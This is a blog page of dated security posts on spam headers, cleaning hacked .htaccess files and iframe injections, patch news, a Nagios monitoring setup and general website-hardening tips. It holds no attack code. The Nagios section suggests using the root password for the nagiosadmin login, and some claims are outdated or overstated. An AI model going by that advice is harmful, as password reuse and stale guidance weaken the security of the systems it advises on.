Category: Security

Posted on

There Is Nothing Which Can Stop Spam Mails Coming or Going Out Of Your Mil Address!!!

Email spam [Junk mail or Unwanted email] really annoys all. There’s something hideous about craftily and repeatedly forcing worthless products onto millions of people who really couldn’t care less about viagra logo enhancements or anything else on offer. Spam is a big problem for everyone from the individual home Internet user to the multi-national corporation that depends on email communications to conduct business.

There are different kinds of spamming around this electronic web world.
– Repeatedly forcing useless products onto millions.
– Hidden text and links
– Blog and Wiki spamming
– Email Bombing
– Porno spam [Mailing of “adult” advertisements or pornographic pictures]
– Virus spam [Mass mailing that contain viruses, Trojans, malicious scripts, etc.]
– Spam scams [Mass mailing of fraudulent messages]
Etc…..

There are more and more spam categories do you ever think about
– What the reason behind it?
– Why this spam’s are not blocked all the time?
– How this spamming happening?
– What action you can take against spamming?
– Can’t we stop this spamming?

Yes it’s true there are many questing regarding this but truly the problem is; “the worst mailing protocol itself”. The founder of mail protocol never thought of this kind of un-presidential use of this discovery. Yes that’s true! Now no one can change this protocol because this protocol is spread like spider web all over the world. One craziest thing in mailing is; any one can send mail to any one with others mail address also if that mail address exists or not! That meant I can send mail from your mail id with out using your mail account, is this craziest!!!

There are many tools and companies in the world to stop and prohibit this spamming but all are failed in it. Till now there is no product or agency which can stop spam mails coming or going out of your mail address. So this is all about mail security. We can only hop a good system will come to stop this nonsense in future.
[ad#add-top-in]
But still there are some tips to Identify this spam mails your self but its little technical I hop all can understand this. By seeing mail you cant identify how is sending mail and from ware it came from. The only way to check that is by looking in to header of the mail. All mail clients have the option to see the header of the mail the header of mail will looks like this it may differ in appearance depends up on providers

Return-Path: [spamers@address.com]
Received: from server.anydomai.com (mail.anymaildomain.com [126.43.75.123])
by spam01.d2.dfd.com (8.10.2/8.10.2) with ESMTP id NAA23597;
Fri, 12 Dec 2008 16:11:20 -0400 (EDT)
Received: from aol.com (127-34-56-98.dsl.mybigisp.com [127.34.56.98])
by server.mymailhost.com; Fri, 12 Jul 2002 13:09:38 -0700 (PDT)
Date: Fri, 12 Jul 2002 13:09:38 -0700 (PDT)
From: Hot Summer Deals <faike@aol.com>
To: your@mailaddress.com
Subject: You won the price of 10$Bln!!

In this you need to check the initial 6 lines which give exact picture of reply address and mail from server. This should mach the last 3 lines. Some time it also dot work; so this is not the 100% best solution for spam mail identification. I hop you can understand the complexity in mail identification.

NOTE:- Better solution is stop opening mails from unknown person. Never click any link in mails and also never download attached file which you are not sure about.

Posted on

How To Remove Google Search Virus Warning Alert? This Site May Harm Your Computer

How To Remove Google Search Virus warning Alert? This Site may harm Your Computer

If your website is facing similar problem while searching then you need to make sure that..

1) Your ‘.htaccess’ file hacked.

Some one hacked your ‘.htaccess’ file and added malicious redirection codes in to it. What it dose means! It redirects the Google or any other search engine request to malicious domains, so for this you can do one thing like Remove all ‘.htaccess’ which are infected or replace it with original one.

2) Make sure your website is not affiliated with any Mallware related website or activates.

Your site may infected by iframe attack where hackers inserted JavaScript iframe codes into your first or last line of index pages of every folders. This calls an external malicious page in to visitor’s computer and loads nasty programs. The codes will be inserted in encoded format, so look like “%20%77%69%6e” in a file. You need to clean this.

Once you have reviewed your website and are sure it is clean, you can submit a request for re-review your site with google manully as follows.
[ad#add-top-in]
Using Google Webmaster Tools. (Note: you need to verify site ownership to see this information).

1. Sign in to Webmaster Tools with your Google account.
2. On the Dashboard, select the site you want.
3. On the Overview page, click Request a review and follow the instructions.

After this Google will review your website manually and, Once they will make sure that it doesn’t host or distribute any type of Malware, they will remove the identification from search results and it will re-index it.

Update:-

I forgot to tell the Reason and Precaution for this problem, here it is …

This can happen for various reasons like:

– poor/compromised account/FTP password, which allows hackers to guess the password [or use brutforce tools] and get unauthorized access.
– user’s computer infected by viruses, which is controlled by hackers. In this situation, customer’s uploads also get infected.
– poor scripts, which allows hackers to insert various malformed queries and remotely execute the code and perform intended action
– Virus effected theme selection for the application
– Installing application which are downloaded form third party sites; mainly not genuine sites.

You will have to ensure that:

– generate a strong password combination [for account, ftp, database etc]
– scan local computer with good antivirus, anti spy ware programs and clean bad programs.
– keep the software up-to-date with vendors/developers, and seek their support/forums for any known vulnerabilities/fixes/workarounds available.

Posted on

Vulnerability in iPhone – Vulnerability In iPhone Mail Application

The iPhone’s Mail and Safari browser applications  could leave owners to a URL spoofing vulnerability, which may allow attackers to conduct phishing attacks against the phone’s users.

By creating a specially crafted URL, and sending it via an e-mail, an attacker can convince the user that the spoofed URL, shown in the mail application, is from a trusted domain, such as a bank, PayPal or a social network.

When the iPhone user clicks on the URL, the Safari browser will be opening the spoofed URL, but still be viewed by the victim as if it is from a trusted domain.

The iPhone user will then be open to phishing attacks as they will enter private information, such as passwords, because they believe they are on the real site and not a fake.

Security researcher Aviv Raff also says. In addition, a security design flaw means the iPhone’s Mail application is also spammable.

iPhone Mail and Safari on firmware 1.1.4 and 2.0 are affected by this vulnerability. Earlier versions may also be affected, said Aviv Raff.
[ad#add-top-in]

Posted on

Mozilla Thunderbird with Nine Security Vulnerabilities:Fixed

Mozilla patched nine security vulnerabilities in Thunderbird.

Thunderbird 2.0.0.16, which was added to Mozilla’s download servers also quashes nine bugs, including one that was patched in Firefox last week, the company’s open-source browser. The remainder fix flaws that were first addressed in early July when Mozilla updated Firefox to version 2.0.0.15.

Seven of the nine bugs were rated moderate by Mozilla, the second-lowest of the four rankings in its threat system. The other two were low.
[ad#add-top-in]
The bug patched in Thunderbird 23rd Jul that was fixed in Firefox before it was in the browser rendering engine’s CSSValue array data structure. According to Mozilla, the vulnerability could be used by hackers to force a crash, and from there, run malicious code. Several other just-patched Thunderbird vulnerabilities could also be used by attackers to execute code remotely.

Thunderbird 2.x, like its browser sibling, is on the way out. Most of Mozilla’s attention is now on Thunderbird 3.0, which has been available as an Alpha 1 preview for more than two months.

Users can download Thunderbird in versions for Windows, Mac OS X and Linux from the Mozilla site, the e-mail client’s built-in updater or wait for the automatic update notification.

reed
Posted on

How to Monitor Websites and Web Services Live for Free from PC

NagiosYes you can Monitor Websites and Web Services Live for Free from PC Using Nagios. Nagios is a host and service monitoring tool  designed to inform network problems. When problems are encountered, the Nagios daemon can send notifications out to you in a variety of different ways (email, instant message,  etc.). Current status information, historical logs, and reports can all be accessed via a web browser too.

Features of Nagios include Monitoring of network services like SMTP, POP3, HTTP, IMAP, PING, FTP, etc. This features also can be used to monitor your websites which are hosted in third party hosting servers, that’s especially from home/office PC itself!!

Setting up Nagios for your domains:

1) Installation process

You can use following commands to install components needed.

  • Installing Apache/httpd and Nagios under Fedroa Core/Cent OS Linux

# yum install httpd
# chkconfig httpd on
# /etc/init.d/httpd start
# yum install nagios nagios-plugins nagios-plugins-all

  • Debian, Ubuntu Linux httpd/Apache and Nagios installation

# apt-get install apache2
# /etc/init.d/apache2 start
# apt-get install nagios-text nagios-plugins nagios-images
or
# apt-get install nagios2 nagios-plugins nagios-images

  • If you don’t have yum/apt. Install stable apache/nagios by downloading from following sites

Apache:- http://httpd.apache.org/
Nagios:- http://www.nagios.org/download/#stable

Now we done with Installation next….
[ad#add-top-in]
2) Configuring Nagios:

  • Add a custom directory for your *.cfg files

# mkdir /etc/nagios2/mysite

  • Edit /etc/nagios2/nagios.cfg and edit the following path

Default path cfg_dir=/etc/nagios2/conf.d to
cfg_dir=/etc/nagios2/mysite

  • Create your own configuration files inside the defined directory that is In /etc/nagios2/mysite; add the following files.

contacts.cfg: Defines the people who will receive the alerts in case of a problem.
Here you need to change e-mail ID and Pager ID.

define contact{
contact_name                    Admin
alias                           Administrator Name
service_notification_period     24×7
host_notification_period        24×7
service_notification_options    w,u,c,r
host_notification_options       d,u,r
service_notification_commands   notify-by-email,notify-by-pager
host_notification_commands      host-notify-by-email,host-notify-by-epager
email                           admin@yourdomain.com
pager                           11111111@pager.yourdomain.com
}

define contactgroup{
contactgroup_name       admins
alias                   Nagios Administrators
members                 Admin # contact_name should be added here
}

host.cfg: Defines the url’s that will be monitored.

##You can add as many as url’s need like bellow
define host{
host_name  jithesh.com
alias      Jithesh
address    www.jithesh.com
use        generic-host
}

define host{
host_name  blog.jithonline.com
alias      JithOnline
address    blog.jithonline.com
use        generic-host
}

#### Hostgroup_name ###
define hostgroup {
hostgroup_name  all
alias           All Servers
members         *
}

# A list of your servers
define hostgroup {
hostgroup_name    servers
alias           Servers
members         jithesh.com, blog.jithonline.com  #Add all host_name here
}

services.cfg: Defines the services that will be monitored for each URL.

## Hostgroups services ##
define service {
hostgroup_name                 servers
service_description             HTTP
check_command                 check_http
use                             generic-service
notification_interval           0
}

define service {
hostgroup_name                 servers
service_description             PING
check_command                 check_ping!100.0,20%!500.0,60%
use                             generic-service
notification_interval           0
}

define service {
hostgroup_name                 servers
service_description             FTP
check_command                 check_ftp
use                             generic-service
notification_interval           0
}

define service {
hostgroup_name                 servers
service_description             POP
check_command                 check_pop
use                             generic-service
notification_interval           0
}

define service {
hostgroup_name                 servers
service_description             IMAP
check_command                 check_imap
use                             generic-service
notification_interval           0
}

define service {
hostgroup_name                 servers
service_description             SMTP
check_command                 check_smtp
use                             generic-service
notification_interval           0
}

templates.cfg: Defines some templates like the generic url, generic service and a lot of others custom templates.

In the default installation you will find files named generic-host_nagios2.cfg, generic-service_nagios2.cfg and there might be others. Just with copy and paste them into /etc/nagios2/mysite directory it will work OK. Anyway, I prefer to put the definitions on each of them into a single file called templates.cfg, but that’s a personal preference.

timeperiods.cfg: Defines time periods which are valid for checks, notifications, etc.

The default configuration file is OK, so just copy and paste it from /etc/nagios2/conf.d/timeperiods_nagios2.cfg to /etc/nagios2/mysite/timeperiods.cfg.

So we have done with all configuration stuffs.

3)  Restart the Nagios service:

# /etc/init.d/nagios2 restart
If there is any configuration error Nagios will tell you where it is when you attempt to restart the service.

4) Monitor your URLs

By opening Nagios in browser
http://<nagios_server_host>/nagios2
user name:-nagiosadmin
passwd:-<set passwd> Most of the case root passwd itself

If you still having problems, don’t hesitate to post comment.

Posted on

Best Tips to Protect your Web Sites from Hackers and Malicious contents

Hack

The Web is scarier than most people realize, according to research published recently by Google.These Web-based attacks become much more common in recent years as firewalls and better security practices by Microsoft have made it harder for worms and viruses to directly attack computers. Nowadays about 1.3 percent of all Google search queries list malicious results somewhere on the first few pages.

Criminals are getting better at this kind of work. They have built very successful automated tools that poke and prod Web sites, looking for programming errors and then exploit these flaws to install the drive-by download software. Often this code opens an invisible iFrame page on the victim’s browser that redirects it to a malicious Web server. That server then tries to install code on the victim’s PC. “The bad guys are getting exceptionally good at automating those attacks,”

[ad#add-top-in]

Following are some tips to get rid of this hackers or hijackers activity.

Keep you password and username safe change it frequently only with strong password check your password with Microsoft

Keep your PC clean from viruses and spy-wares because there are chances to hijack your PC contents and login cookies etc. Scan your PC for viruses now with NOD32 Online Antivirus Scanner

Keep all folders and files permissions proper in your web hosting accounts/server. Never give full permission for the folders and files, that means read write and execute permission. If you are hosting sites in Linux platform never give 777 permission (read write and execute permission) to all members even for net users of file and folders. The preferred maximum permission is 755. This means write permission for root user and only read and execute permission for others.

There are many techniques used to hack/hijack the website

Cross Site Scripting (XSS)

SQL injection flaws

Site reconnaissance

Session hijacking

Application denial of service

Cookie/session tampering

To withstand from this you need “professionally well designed websites” and also powerful web sitefirewall at server end.

You need to choose good web hosting platform or company which provides good firewalls and Security. If you are going for Linux platform better to choose Grsecurity enabled kernel Servers; especially for shared hosting.

But not the least the best way to find the flow in website is by checking the web site stats all the day. By this you can find the links/URL which are not related to your website so that you can delete it before it spreads through search engines.

If some one reports your site having virus then its 99% sure your site home pages are having masked IFrames at the beginning or last lines of the page, which actually downloads virus file form some other server/site. You can fix it your self by editing your home page and removing the contents which looks like as shown bellow.

Iframe

These are some of the tips which really helps to protect yourself from Hackers and Malicious contents

Posted on

Tips to Protect your PC from Malicious Sites Using McAfee Siteadvisor Plug-In

McafeeMcAfee SiteAdvisor, a plug-in for Internet Explorer and Firefox browsers, tests, analyzes and rates websites in detail for unsafe or annoying practices such as dangerous downloads, spamming, misuse of personal information and browser hijacking. This helps you sidestep possible identity theft or fraud traps. When searching with Google, Yahoo! or MSN, SiteAdvisor’s easy-to-understand safety ratings too

[ad#add-top-in]
1) Browser tool bar

As you browse Site, a small button on your browser toolbar changes color based on SiteAdvisor’s safety results.
Red (Danger) Mc Red

McAfee tests revealed some serious issues that you’ll want to carefully consider before using this site at all. (Example: The site sent lots of spam e-mail or bundled adware with a download).

Yellow (Caution) MC Yellow

McAfee tests revealed some issues you should know about. (Example: a site tried to change browser defaults, or sent a lot of non-spam e-mail)

Green (Safe) mc green

McAfee Tested the site and didn’t find any significant problems. (Secure sites.)

Gray (Not submitted site) Mc Gary

The site has not been tested, or is in the process of being tested also you have option to submit the site to test also.

You have a menu options on SiteAdvisor’s toolbar which let you customize SiteAdvisor or see a site’s detailed test results too.

2) Search Page

When you search with Google, Yahoo! or MSN, SiteAdvisor’s safety ratings appear next to search results. Ratings—Red indicates dagger that means this site reported virus downloads and also linked to malicious sites which already rated Red in Macfee database.

Search-res

You can also get more information about the site by keeping the mouse pointer on the alert symbol; it will show a popup in search window it self, which gives summary of the sites status.

Search Pop

3) Detailed Test Results

Also a detailed test results for every site are available by clicking on the more info link; in that you can see the external sites which are linked to this site as shown bellow.
Linked

So it will be very hand if you installed McAfee SiteAdviso in your PC while surfing the giant www network.

Download it here….

Posted on

Google had security issue with its GrandCentral.com telecom service and Google.com : Fixed

Google

Google has fixed security issue related to its Central telecom service and its Google.com Web site..

Google fixed a cross site scripting exposure on the log-in page for Grand Central, a service that allows people to have numerous phone numbers ring on one phone and have a unified voice mail.

A cross-site script is a vulnerability found increasingly in Web applications in which malicious code can be injected into Web pages that could be used to attack or compromise visitors to the site.

“This issue was reported on Monday morning, and google closed it shortly after being notified”.

The vulnerability was posted to a security e-mail list called Full Disclosure and was not reported to Google in advance, meaning Google had to race to fix the issue before someone could write an exploit for it.

[ad#add-top-in]

In a separate security issue, Google fixed a weakness that allowed people to create a spoof site that looks like it goes to the Google.com domain but actually redirects a Web surfer to a different site. Such redirect links are usually distributed via e-mail and often send people to a site with malicious code that can be used to attack or compromise the visitor’s computer.

Google, meanwhile, was working to fix a redirect vulnerability related to the site of its DoubleClick online advertising unit.

Posted on

Patches for Critical Bugs in Windows ActiveX System Released

Microsoft

Microsoft issued a critical patch for two vulnerabilities in the core graphics subsystem of Windows. One of eight fixes released Tuesday as part of its monthly security updates.

Microsoft released a total of five critical patches in its April security bulletin. Two of them fix bugs in Windows, two fix bugs in Windows and Internet Explorer (IE), and one fixes a vulnerability in Microsoft Office. The critical rating means an attacker could potentially exploit the flaws to hack into a victim’s computer.
The other patches fix vulnerabilities in Windows and Office and were rated “important.” Microsoft releases patches on the second Tuesday of every month, which has become known in the industry as “Patch Tuesday.”

* MS08-018, fixes for vulnerabilities in Microsoft Office

* MS08-021 fixes two vulnerabilities in Windows’ graphics device interface (GDI)

* MS08-022 patches vulnerability in VBScript and JScript scripting engines

* MS08-024 patches a vulnerability found in all versions of IE

* MS08-023 fixes an ActiveX vulnerability that affects both Windows and Internet Explorer.
[ad#add-top-in]
In Sarwate’s opinion, MS08-021, MS08-022 and MS08-023 are especially important for users because they affect all versions of Windows, even if no other software is installed on the machine.